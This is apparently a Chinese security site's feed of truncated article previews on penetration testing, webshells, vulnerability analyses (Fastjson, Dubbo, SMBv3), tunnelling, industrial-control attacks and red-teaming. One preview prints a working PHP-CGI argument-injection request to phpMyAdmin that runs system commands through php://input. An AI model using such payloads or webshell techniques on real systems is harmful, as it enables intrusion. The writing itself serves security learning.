前段时间又又又又因为门禁卡的问题没进去小区门，遂决定多复制几张方便随身携带。对该过程进行整理，希望能帮到同样丢三落四的小朋友们。 1、 简要说明 IC 卡是集成电路卡的简称，是镶嵌集成电路芯片的塑料卡片，芯片一般采用不易挥发性的存储器、保护逻辑电路、 甚至带微处理器CPU。 ID 卡全称为身份识别卡，是一种不可写入的感应卡，含固定的编号，ID卡与磁卡一样，都仅仅使用了“卡的号码”而已，卡内除了卡号外，无任何保密功能，其“卡号”是公开、裸露的。所以说 ID 卡就是“感应式磁卡”。 区别：ID卡一般为低频卡，工作频率是 125KHz。IC卡为高频卡，工作频率13....

可以说内网渗透测试，其本质就是信息收集。信息收集的深度，直接关系到内网渗透测试的成败。当你拿下内网的一台主机后，面对的是一片未知的区域，所以首先要做的就是对当前所处的网络环境进行判断。包括以下几点： 对当前机器角色的判断 对当前机器所处的网络环境进行判断 对当前机器所处的网络区域进行判断 本机信息收集 查看当前用户、权限 whoami whoami /all // 查看当前域并获取域SID 当前域为god，当前域的sid为S-1-5-21-2952760202-1353902439-2381780...

一、导出函数写shell 利用Mysql的导出函数直接写一个可访问的webshell 1.1 条件 1.网站可访问路径的绝对路径 报错 输入异常值让脚本主动报错，或googlehacking目标的脚本报错信息 phpinfo 扫目录找phpinfo 推测 目标可能使用集成安装包，如phpstudy C:\phpStudy\WWW\C:\phpStudy\WWW\域名\ 枚举 高频绝对路径 读配置文件 中间件，web的配置文件 2.secure_file_priv 的值非NULL或包...

前言 上一篇《信息收集篇》中我们讲了如何使用ISF框架发现工控设备，那么有些小伙伴就会问了，发现工控设备之后能做些什么呢？答案是很多，比如：查看设备有没有密码保护？有密码保护能不能破解？破解后都能做些什么等等问题。为了让大家循序渐进地学会工控相关的安全攻防，我们需要先学习一些工控的相关知识。本篇我们就来讲讲与暴力破解相关的基础知识，为后续暴力破解做好准备。 首先，为了能让工业机器相对“智能”，就需要一个可以控制这些机器的设备来控制它，而这个设备应该具备通用性和可复用性，这就是PLC类设备。一个通用的，可重复改写的逻辑控制设备。人们可以通过编写一些程序下载到PLC中，然后PLC通过读取...

框架介绍 声明：ISF该框架是北京安帝科技基于开源框架自研的一套工控渗透框架，仅用于工控安全教学，公司实验箱产品的安全研究，使用该框架进行非法操作产生的一切后果公司一概不负责。 框架主要使用Python语言开发，通过集成ShadowBroker释放的NSA工具Fuzzbunch攻击框架，开发一款适合工控漏洞利用的框架。由于Fuzzbunch攻击框架仅适用于Python2.6，很多核心的功能都封装成了DLL，通过函数进行调用，不便于后期的移植和使用。但是，Fuzzbunch的命令行使用的确很方便，所以就有了现如今这款适合工控漏洞利用的框架，取名isf。 环境准备 ...

一、样本简介及行为检测 样本伪装成了eset的升级程序 图标如下 由于再分析之初对样本行为不太清楚，这里需要用到相应的行为检测工具，此类工具有火绒剑，systracer，Procmon，Sysmon等，这里我们采用火绒剑来看下，具体步骤 然后双击运行样本即可开启对相应样本的监视，程序运行后界面如下 我们看到该程序的这里火绒剑标记为了蓝色，这里完成了程序的释放、自拷贝、开机自启动这些操作。 相关网络请求如下 可以看到该样本与general-second.or...

前言     前不久传的沸沸扬扬的FastJson反序列化漏洞，相信有不少企业都中招了，当然我司也未能幸免，基于次漏洞更具官方给的补漏措施，已完全可以避免在这不再阐述。本文就拿它从一个简单的FastJson 漏洞开始，搭建漏洞环境，分析漏洞成因，使用条件等。从入门者的角度看懂并复现漏洞触发，拥有属于自己的一套漏洞调试环境。 以下便是部分官方公告： 0x01 Fastjson简介     “Fastjson” 是Alibaba的开源JSON解析库，它可以解析 JSON...

写入WebShell 利用php配置漏洞，执行php代码进而执行系统命令 （可利用Burpsuite发送POST） POST http://192.168.2.101/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.2.101 Content-Length: 34 <?php passthru('id'); die(); ?> 将执行命令替换为 passthru('ls /var/www'); 1 查看www网站下的...

前言 首先这不是一篇总结性的帖子，毕竟对于密码找回的测试方法网络上有比较全面的总结，比如用户凭证暴力破解，系统返回了重要的凭证，邮箱手机弱token,token通用，session覆盖，用户凭证有效期问题，凭证算法被破解，前端校验等等一系列漏洞。在这里附上前辈总结的脑图，总结的也是比较详细了。 在日常的授权测试以及论坛瞎逛中，发现了一些对于个人而言比较有意思的找回密码的操作，独乐乐不如众乐乐，分享出来希望能帮到各位师傅。 Host Header欺骗 有些人认为HTTP的联机就是靠包里的HOST header来连接的,所以会认为如果修改掉包里的HOST, 那么就连接不...

一个经典的过人WebShell 大概是在去年，闲着无聊的时候翻阅知乎，看到了这么一个回答：https://www.zhihu.com/question/68591788/answer/269545371 其中最后那个过人的 webshell 引起了我的注意： dataProcessor($f[$i]); } else { $c .= $this->dataProcessor($f[$i]); } } $t = $r('',"$c");...

最近比较闲，就开始回头看看。 17年在某个大厂开始从安全技术转型从事黑灰产威胁情报这方面研究，从事黑灰产威胁情报挖掘也已经有三年多了。也认识了很多同行，有甲方也有乙方，但是每一家都是在摸爬滚打中前进，各有各的优势与看法。最近几天跟很多朋友聊，各家都想建立威胁情报，又都没经验，刚好我也就整理下思路，聊聊我眼中的黑灰产威胁情报。 最主要的还是中国黑灰产实在是太强，而且近几年又朝着职业化、产业化、服务化、智能化与国际化的方向进行升级转型。当南京那个航班延误险骗赔300万的案件出来的时候，一下就理解保险公司的无奈。 我们也是被按在地上摩擦了三年了，当中的故事实在是太多。有机会写本...

拿到手域名一个 cc.test.com 打开后直接就是一个登陆框 随手输入admin准备打密码，提示管理员不存在 说明此处可以爆破用户名，使用字典爆破得到三个用户名 test wangw wangy 登陆抓包密码被md5加密了 使用多账号爆破小字典爆破三个账号的密码，没有爆出来 使用常用弱口令top5000爆破依然爆破不出来 根据厂商域名生成字典（以test代替） 爆破三个用户依然爆破不成功，于是回到用户名爆破，可以注...

什么是隧道？ 在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。 上一节中，我们讲解了网络层的隧道技术（IPv6 隧道、ICMP 隧道）和传输层的隧道技术（TCP 隧道、UDP 隧道、常规端口转发）。现如今，TCP、UDP 通信大量被防御系统拦截，传统的Socket...

事情起因 事情是这样子的，那天逛着街路过一家手机店，当场被店门口招揽客人的销售员拦下，硬塞了一张活动条和充电宝给我说什么充电宝免费送，但要到店里边填个卷就行了，七月的天异常的热，反正也没什么急事进去蹭蹭空调也不错，进店后里面的店员向我要了号码说是要查一下积分，通过短信查询告知我号码的积分是一千八百多，细节来了：这里他表现的很惊讶问我的积分为什么那么高，积分高的话这里好啊那里好的给我一顿吹嘘使我膨胀，后面他拿出个清单说你这积分已经可以领平板电脑了，清单上面有手充电宝、小风扇、手机、电饭锅和平板电脑等等，当然平板电脑排在最高积分那，按照常人的选择大部分...

0x00 什么是红队 红队，一般是指网络实战攻防演习中的攻击一方。 红队一般会针对目标系统、人员、软件、硬件和设备同时执行的多角度、混合、对抗性的模拟攻击；通过实现系统提权、控制业务、获取数据等目标，来发现系统、技术、人员和基础架构中存在的网络安全隐患或薄弱环节。 红队人员并不是一般意义上的电脑黑客。因为黑客往往以攻破系统，获取利益为目标；而红队则是以发现系统薄弱环节，提升系统安全性为目标。此外，对于一般的黑客来说，只要发现某一种攻击方法可以有效地达成目标，通常就没有必要再去尝试其他的攻击方法和途径；但红队的目标则是要尽可能地找出系统中存在的所有安全问题，因此往往会穷尽已...

Oracle注入学习 最近学习过程中碰到了有使用oracle数据库的站，但是最后没有拿下来 太菜了ORZ 所以学习了一下oracle注入，oracle其他的洞还在学习中ing... Oracle数据库 Oracle安装 先来了解一下oracle数据库： Oracle Database，又名Oracle RDBMS，或简称Oracle。是甲骨文公司的一款关系数据库管理系统，系统可移植性好、使用方便、功能强，适用于各类大、中、小、微机环境。它是一种高效率、可靠性好的、适应高吞吐量的数据库方案。 oracle数据库 把...

一 、本篇 本文为“DEDECMS伪随机漏洞”系列第三篇，查看前两篇可点击链接： 第一篇：《DEDECMS伪随机漏洞分析 (一) PHP下随机函数的研究》 第二篇：《DEDECMS伪随机漏洞分析 (二) cookie算法与key随机强度分析》 根据第二篇,我们有信心去遍历root key的所有可能, 但是我们还需要一个碰撞点, 才能真正得到root key的值, 本篇找到了两个碰撞点, 并编写了简单的POC来获取root key. 二 、碰撞点 可能还存在其他碰撞点, 这儿仅找到两个: ) 1.用户主页 ...

本文讲述了作者通过Gsuite邮件发送功能，可构造后缀为@google.com的任意发件人身份，实现SMTP注入，漏洞获得了谷歌$3133.7的奖励。 Gsuite是谷歌旗下的一款整合协同办公软件，它可以用来管理组织机构内部账户，允许管理员对内部账户进行权限划分、应用程序访问控制、通讯录查看以及邮件头应用等操作。 其中，Gsuite的邮件头应用功能引起了我的兴趣，如今的电子邮件头中包含了一些可以“利用”的SMTP协议信息，它算是一种古老的通信协议了，几乎每个接触互联网的人都会使用到它。这里的“利用”指的是我们可以从中发现一些有用信息，从而做一些尝试性的欺骗测试。谷歌这种大厂其...

什么是隧道？ 在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。 常用的隧道技术有以下三种： 网络层：IPv6 隧道、ICMP 隧道 传输层：TCP 隧道、UDP 隧道、常规端口转发 ...

网上针对sqlmap进行dns注入的相关文章太少，只是简单介绍了下--dns-domain参数，相关的实战文章要么就写的模糊或者一笔带过，搞的云里雾里（主要是菜，关键还没大佬带）。然后自己参考网上的方法自己重新搞了一遍。 需要准备的东西，sqlmap、windows盲注一个、两个域名、一台外网服务器。 某次搞事情的时候碰到一个时间盲注，碰巧是台windows的，想起dns注入的方法。 在开始前我准备先用sqlmap的--sql-shell 命令进行dns注入payload的测试 先到burpsuite中的collabo...

北京时间2020-6-22日Apache官方发布了Dubbo 2.7.7版本，其中修复了一个严重的远程代码执行漏洞（CVE-2020-1948），这个漏洞是由腾讯安全玄武实验室的ruilin提交，该漏洞允许攻击者使用任意的服务名和方法名发送RPC请求，同时将恶意序列化参数作为有效载荷，当恶意序列化的参数被反序列化时将执行恶意代码。该漏洞与 CVE-2017-3241 RMI反序列化漏洞有点类似，都是在远程调用过程中通过方法参数传入恶意序列化对象，服务端在解析参数进行反序列化时触发。Dubbo Github Star数量32.8k，知名度不亚于fastjson，被大量企业使用，包括一些知名互联公司，漏洞影响十...

大家好，我是海盗，欢迎来到海盗茶馆。今天跟大家聊一下车机的渗透思路以及实例。 基础知识：什么是车机 车机，通俗理解就是车内的那块大屏。在看各种paper、文档的时候你会发现有各种叫法。IVI、AVN、HMI、HU等等，不要疑惑，指的都是同一个东西。 IVI:In-Vehicle Infotainment，车载信息娱乐系统。 AVN:指的是audio、video、navigation。最初的几个车内的功能。后来代指车机。 HMI: 人机接口。这个前面也讲过了。 ...

一、CVE-2020-0796简介 0x01 漏洞简介 CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的；在解压数据包的时候使用客户端传过来的长度进行解压时，并没有检查长度是否合法，最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码，该漏洞类似于永恒之蓝。 0x02 影响版本 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Ver...

完整攻击链大概包括信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等七步，虽然这个站点只经历了前四步，但也具有较强的代表性，组合利用漏洞形成攻击链，拿下管理权限。 事情缘起 杜兄弟在某旅游集团公司任职 IT 技术主管，有两家驻场安全厂商为其提供安全服务，一家负责业务相关的渗透测试，一家负责网络访问、流量监测的安全管控，上周和他吃了个串串，整个饭局除了刚开始的寒喧，大部份时间就是布道，在他的管理下，生产系统做到了绝对安全。 well，你知道的，虽然我在蓝队，但一直有颗红心。自然得怼一下，“这个还是要看攻击者哟，攻防演练没丢分，说明不了啥子三”，杜兄弟不高...

应用介绍 虚的不说了，简单点说就是一个日志型数据库，并有主从同步的功能（优化性能）。 漏洞介绍 默认配置下redis并没有设置密码，被攻击者恶意利用可以导致未授权访问，可以有多种利用方式：服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等 安装redis docker run -itd --name redis-test -p 6379:6379 redis 常用命令 ping：检测是否连通 且 有权...